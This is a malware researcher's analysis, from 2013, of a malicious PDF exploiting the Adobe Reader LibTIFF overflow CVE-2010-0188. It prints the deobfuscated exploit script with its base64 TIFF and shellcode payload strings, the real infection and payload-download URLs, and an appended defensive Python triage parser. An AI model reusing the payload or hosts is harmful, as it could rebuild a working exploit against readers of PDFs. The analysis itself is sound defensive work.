#MalwareMustDie - Suspected PDF 0day Analysis (FIN)

MalwareMustDie, Jan 24th, 2013 (edited)
#MalwareMustDie

// Source of infection URL & download PoC:

--2013-01-24 13:10:15--  h00p://hzebw.portrelay.com/jentrate.php
Resolving hzebw.portrelay.com... seconds 0.00, 78.110.63.106
Caching hzebw.portrelay.com => 78.110.63.106
Connecting to hzebw.portrelay.com|78.110.63.106|:80... seconds 0.00, connected.
   :
---request end---
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.2.3
Date: Thu, 24 Jan 2013 04:10:12 GMT
Content-Type: application/pdf
Content-Length: 5633
X-Powered-By: PHP/5.3.17
Content-Disposition: inline; filename=test.pdf

---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 5633 (5.5K) [application/pdf]
Saving to: `jentrate.php'


// PDF download report:
https://www.virustotal.com/file/c7236e6776fd06a60d26b37801e6dd7dfc11b53f9ee18504448af5c08c63f926/analysis/ (7/46)

// Automated decoding references: jsunpack:
http://jsunpack.jeek.org/?report=516115790568fd46e1f72c952074a64755947796
// wepawet:
http://wepawet.iseclab.org/view.php?hash=7aa672bc48698a62dceb83daa97cd1e4&type=js&t=1359040097

WHAT'S THIS? Many suspected this to be a PDF 0day.
I attempted to analyze the exploitation of this PDF; below is the report of the decoding
which automation couldn't take further, followed by the exploitation details and
the exploit kit info used.

The first one who detected this issue was @Donovan.
Also special thanks to all the participating engineers at the #InfoSec group: @bartblaze @nsmfoo @StopMalvertisin @undeadsecurity @essachin @it4sec @EricOpdyke

// changed the script as follows...........
//
edlejemod = "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";

function tblefdr(o, k){   // blah..
 while (o.length < k){
   o += o
 }
 return o.substring(0, k)
}

fkyhifxmy(); //<== the main

function fkyhifxmy(){       // PoC of Libtiff integer overflow in Adobe Reader and
                           // Acrobat CVE-2010-0188 is detected here see the strings..

 hboxwhkju = "o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEp0JASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyi0U8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==";
 neeynlkdi = "kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol";
 lfwfnldsc = "SUkqADggAACQ";
 eosjddjas = "kJCQ";
 vbnqhwdkk = "kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////";
   function rvcorgs(){
   // mm = app.viewerVersion.toString(); // bypass this mm bullshit...
   // mm = mm.replace(".", "");
   // while (mm.length < 4){
   //  mm += 0
   //}
   mm = 9000;   // changed the mm to value bigger than 8000 ( the exploit target version)
   ll = 10;
   return parseInt(mm, ll)
 }
 pxhnxcedi = rvcorgs();            // suspected logic/parts..
 if (pxhnxcedi >= 8000){          // this number means Adobe ver 8.0.0.0
   gjoegkdqt = lfwfnldsc;
   gjoegkdqt += tblefdr(eosjddjas, 2000);
   gjoegkdqt += edlejemod;                   // while feeding obfs data...
   gjoegkdqt += tblefdr(eosjddjas, 7736);
   gjoegkdqt += vbnqhwdkk;
   gjoegkdqt += (pxhnxcedi < 8201 ? hboxwhkju : neeynlkdi); //ver 8.2.0.1
   //esrmhkwko.rawValue = gjoegkdqt  // skip this lousy part.. it just called the
                                     //var form in PDF for feeding output values..
   document.write(gjoegkdqt);   // <--- change to this to burp value resulted...
 }     // be noted variable esrmhkwko <-- key of exploitation
 return
}
  88.  
//==================BURP RESULT==============================

//

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

// to be clearer view:

// this base64 string is what gets fed to an object,
// namely the one with this initial name (esrmhkwko), a Widget:

<</TU (esrmhkwko) /Subtype/Widget /Ff 65536 /T (esrmhkwko[0]) /Parent 1 0 R /P 9 0 R
  ^^^^^^^^^^^^^^^^                           ^^^^^^^^^^^^^^^^^
/Rect [21 22 186 69] /DA (/CourierStd 10 Tf 0 g) /Type/Annot /MK <</TP 1>> /F 4 /FT/Btn>>

// and at this event... in the embedded object's script:

<subform w="576pt" h="756pt" name="yrjlbwacv"><field h="65mm" name="esrmhkwko" w="85mm"....>
                                                              ^^^^^^^^^^^^^^^^^^
<event name="etnvwbihl" activity="initialize">
<script contentType="application/x-javascript">
   :
   :
=================================
THE REPORT OF ALL THIS
================================
  243.  
// It wasn't a new 0day concept. It was a known flaw: a PDF Widget fed with a malformed object to be
// run by the Flash player. The story is like this:

// In the PDF the embedded object was attached:
<</Length 4075 /Filter/FlateDecode /Type/EmbeddedFile>>
stream
(compressed binary stream data, not reproduced here)

// And it has the widget object in it (the variable name is changed in every sample):
<</TU (esrmhkwko) /Subtype/Widget /Ff 65536 /T (esrmhkwko[0]) /Parent 1 0 R /P 9 0 R /Rect [21 22 186 69] /DA (/CourierStd 10 Tf 0 g) /Type/Annot /MK <</TP 1>> /F 4 /FT/Btn>>

// The embedded object, decoded, turns out to contain JavaScript:
<?xml version="1.0" encoding="UTF-8"?><?xfa generator="AdobeDesigner_V7.0" APIVersion="2.2.4333.0"?><xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><config xmlns="http://www.xfa.org/schema/xci/1.0/"><present><pdf><version>1.65</version><interactive>1</interactive><linearized>1</linearized></pdf><xdp><packets>*</packets></xdp><destination>pdf</destination></present></config><template xmlns="http://www.xfa.org/schema/xfa-template/2.5/"><subform layout="tb" locale="en_US" name="tkbsrqyin"><pageSet><pageArea id="ydnjfsoqp" name="ydnjfsoqp"><contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/><medium long="792pt" short="612pt" stock="default"/></pageArea></pageSet><subform w="576pt" h="756pt" name="yrjlbwacv"><field h="65mm" name="esrmhkwko" w="85mm" x="53mm" y="88mm">
<event name="etnvwbihl" activity="initialize"><script contentType="application/x-javascript">
vgbnjqjrs="affsdfsa";
   :
  :
// When the event initializes (long story of double obfuscation: the first layer is like the
// wepawet report linked above, the second one is the code pasted above),
// the naughty exploit string is created, here: http://pastebin.com/raw.php?i=xswdDqhd

// The script feeds that string back into the PDF Widget part.
// See the variable with ver >= 8.x in the decoded code:
    //esrmhkwko.rawValue = gjoegkdqt  // skip this lousy part.. it just called the
                                      //var form in PDF for feeding output values..
    document.write(gjoegkdqt);   // <--- change to this to burp value resulted...

// and compare to

<</TU (esrmhkwko) /Subtype/Widget /Ff 65536 /T (esrmhkwko[0]) /Parent 1 0 R /P 9 0 R /Rect [21 22 186 69] /DA (/CourierStd 10 Tf 0 g) /Type/Annot /MK <</TP 1>> /F 4 /FT/Btn>>

// This means it is fed as an object to a widget;
// the PDF reader treats a widget mostly as an image or movie in the SWF engine/Flash Player.
// The malformed characters exploit the flaw to run code with the API URL to get the payload.

// The malformed parts are:

SUkqADggAA
  :
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
   :
AcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol
  285.  
// ANALYSIS...

// There is no room for the binaries here, and these are the buffer overflow characters I use a lot at DefCon;
// AAAA....AAAAA is a flood of 0x41
   :
So the obfuscation of the URLs is in the rest of the part still to be dug into, which must contain the downloader.. I am currently XORing this

I am sure that versions before 8 are not affected by this exploit. It aimed at the PDF widget Flash engine flaw. Mostly used on ver 8.x or above, I guess.

The concept is like these references:
http://bugix-security.blogspot.jp/ or
http://contagiodump.blogspot.jp/2011/04/apr-8-cve-2011-0611-flash-player-zero.html
↑ So, as engineers, can we call it a 0day of the old concept?
===================
So what's this?
==================
It is more like a new exploit kit that used a PDF exploit with a NEW PoC exploiting an old-concept flaw in
the Flash embedded player at the PDF Widget,
or, if I may say, a variant of CVE-2011-061.
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^
  306.  
// [IMPORTANT] Another interesting obfuscation concept:
//-------------------------------------------------------
// It was mentioned that it uses a pseudo-variable based on the date (time);
// see below:

fejrocemr=this.w[eoewdzos.info.Date+"&#0108;"];
fejrocemr('function laumlpiah(){ret'+'urn("x2tdh45jRe0Ax2tdh45jRe65x2tdh45jRe64x2tdh45jRe6Cx2tdh45jRe65x2tdh45jRe6Ax2tdh45jRe65x2tdh45jRe6Dx2tdh45jRe6Fx2tdh45jRe
// This makes the first obfuscation layer burp its result in different variable values;
// I guess it is a new way to avoid detection.
  316.  
// WHAT EXPLOIT KIT WAS USED?

From the discussion between @Donovan and @it4sec, it looks like KaiXin EK (or Impact EK) is behind all this..
record: https://twitter.com/MalwareMustDie/status/294456735953985536

// Where is THE URL???

// see the code above, in this variable:

 hboxwhkju = "o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAABReASiBWhEoPY4BKo+uASjAggkqvWIBKXVyASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQQUXgEpqaVmNEE2BSgUXgEp0JASNMFOBSgUXgEpBQUFBeAzzpEtTgUoCF4BKQUFBQTHJZItxMIt2DIt2HItuCItGIIs2ZjlIGHXyi0U8i1QFeAHqi3IgAe4xyUGtAeiLGCtYBIH75SDd/3XvSYtaJAHrZosMS4taHAHrAyyLieZqBP82/9WFwK119YE4SUkqAHXtljHJtQPzpQ==";

// you'll notice the base64 code trail is in there
//  ( = the moron was making a terrible miss.. idiotic coder.. good!)


// decode all of the base64 strings and you'll get the shellcode pattern, exploit pattern and URL below...
  333.  

// So did you see anything useful?
// yes, the tail of the decoded dump (after the 0x41 flood) is part of the shellcode..

// the code following the NOP sled contains the URL:

// turn the hex into text and see it: most of it is non-printable, but the tail reads:
http://78.110.60.99//olegdemy.php?

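Added triage helper (not part of the original paste): it takes the base64 the script writes into the field's rawValue, checks the TIFF header and IFD that the decoded bytes form, flags the oversized DotRange entry (the CVE-2010-0188 pattern named in the script's comment), measures the 0x90 sled and pulls out plaintext URLs. The header and IFD chunks are the page's own lfwfnldsc and vbnqhwdkk strings; the rest of the test input (0x90/0x41 filler and the c2-placeholder.invalid URL) is constructed here and stands in for the real payload.

```python
import base64
import re
import struct

# Two base64 chunks quoted from the decoded script on this page: the TIFF
# header chunk (lfwfnldsc) and the IFD chunk (vbnqhwdkk).
TIFF_HEADER_B64 = "SUkqADggAACQ"
IFD_B64 = ("kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAAB"
           "AAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////")

TAG_NAMES = {0x0100: "ImageWidth", 0x0101: "ImageLength", 0x0103: "Compression",
             0x0106: "PhotometricInterpretation", 0x0111: "StripOffsets",
             0x0117: "StripByteCounts", 0x0150: "DotRange"}
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8}
# DotRange holds two values; the CVE-2010-0188 LibTIFF bug in Adobe Reader is
# triggered by a DotRange entry whose count overruns the fixed-size buffer.
DOTRANGE_MAX_COUNT = 2


def decode_rawvalue(b64_text):
    """Decode the base64 the script writes into the field's rawValue. The script
    glues 4-aligned chunks together, so tolerate stray '=' and re-pad at the end."""
    clean = re.sub(r"[^A-Za-z0-9+/]", "", b64_text)
    return base64.b64decode(clean + "=" * (-len(clean) % 4))


def parse_ifd(data):
    """Parse a little-endian TIFF header and its first IFD; return a report dict."""
    if len(data) < 8 or data[:4] != b"II*\x00":
        raise ValueError("not a little-endian TIFF (missing II*\\0 magic)")
    ifd_off = struct.unpack_from("<I", data, 4)[0]
    if ifd_off + 2 > len(data):
        raise ValueError("IFD offset 0x%x lies beyond the payload" % ifd_off)
    count = struct.unpack_from("<H", data, ifd_off)[0]
    entries, findings = [], []
    for i in range(count):
        pos = ifd_off + 2 + 12 * i
        if pos + 12 > len(data):
            findings.append("IFD truncated after %d entries" % i)
            break
        tag, typ, cnt, val = struct.unpack_from("<HHII", data, pos)
        name = TAG_NAMES.get(tag, "0x%04x" % tag)
        entries.append((name, typ, cnt, val))
        if tag == 0x0150 and cnt > DOTRANGE_MAX_COUNT:
            findings.append("DotRange count %d > %d: CVE-2010-0188 pattern" % (cnt, DOTRANGE_MAX_COUNT))
        size = cnt * TYPE_SIZES.get(typ, 1)
        if size > 4 and val + size > len(data):   # out-of-line data must fit in the blob
            findings.append("%s data at 0x%x runs past the payload" % (name, val))
    return {"ifd_offset": ifd_off, "entries": entries, "findings": findings}


def longest_nop_run(data):
    """Length of the longest run of 0x90 bytes (the 'kJCQ' padding decodes to these)."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == 0x90 else 0
        best = max(best, cur)
    return best


def find_urls(data):
    """Plaintext URLs left inside the blob (the sample on this page carried one)."""
    return [m.decode("ascii") for m in re.findall(rb"https?://[\x21-\x7e]+", data)]


def triage(b64_text):
    """Full check of one rawValue blob: TIFF structure, sled length, embedded URLs."""
    data = decode_rawvalue(b64_text)
    report = parse_ifd(data)
    report["nop_sled"] = longest_nop_run(data)
    report["urls"] = find_urls(data)
    return report


def build_fixture():
    """Constructed test input: the page's own header and IFD chunks, with the
    shellcode region replaced by 0x90 filler plus a placeholder URL, and the
    DotRange data replaced by inert 0x41 filler. Not the real payload."""
    header = base64.b64decode(TIFF_HEADER_B64)      # II*\0, IFD offset 0x2038, one 0x90
    ifd_chunk = base64.b64decode(IFD_B64)           # one 0x90, 7 entries, first 8 DotRange bytes
    ifd_off = struct.unpack_from("<I", header, 4)[0]
    marker = b"http://c2-placeholder.invalid/gate.php?\x00"   # stand-in, not the real URL
    filler_len = ifd_off - 1 - len(header)          # -1: the IFD chunk carries its own 0x90
    body = b"\x90" * 1500 + marker                  # 1500 = 2000 base64 chars of "kJCQ"
    body += b"\x90" * (filler_len - len(body))
    dotrange_tail = b"\x41" * (0xCC * 2 - 8)        # remaining SHORTs of the 0xCC count
    return base64.b64encode(header + body + ifd_chunk + dotrange_tail).decode("ascii")


if __name__ == "__main__":
    result = triage(build_fixture())
    for entry in result["entries"]:
        print("%-26s type=%d count=%d value=0x%x" % entry)
    print("findings:", result["findings"])
    print("longest NOP sled:", result["nop_sled"], "urls:", result["urls"])
```

On the constructed input the seventh entry is reported as DotRange with count 0xCC at offset 0x2092, exactly the layout the script's vbnqhwdkk chunk encodes.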
#w00t!!

----
#MalwareMustDie
reported by : @unixfreaxjp